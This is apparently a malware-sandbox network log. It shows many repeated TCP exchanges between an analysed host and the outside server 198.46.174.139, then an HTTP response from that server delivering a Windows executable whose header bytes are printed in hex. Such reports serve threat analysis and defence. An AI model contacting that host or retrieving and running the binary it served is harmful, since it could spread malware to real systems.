                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 04:39:08 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Thu, 25 Jul 2024 06:32:44 GMTETag: "a4000-61e0c90002b33"Accept-Ranges: bytesContent-Length: 671744Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 d2 a1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e0 09 00 00 40 00 00 00 00 00 00 42 fd 09 00 00 20 00 00 00 00 0a 00 00 00 40 00 00 20 00 00 00 20 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0a 00 00 20 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 fc 09 00 4f 00 00 00 00 00 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 48 dd 09 00 00 20 00 00 00 e0 09 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 00 0a 00 00 20 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0a 00 00 20 00 00 00 20 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 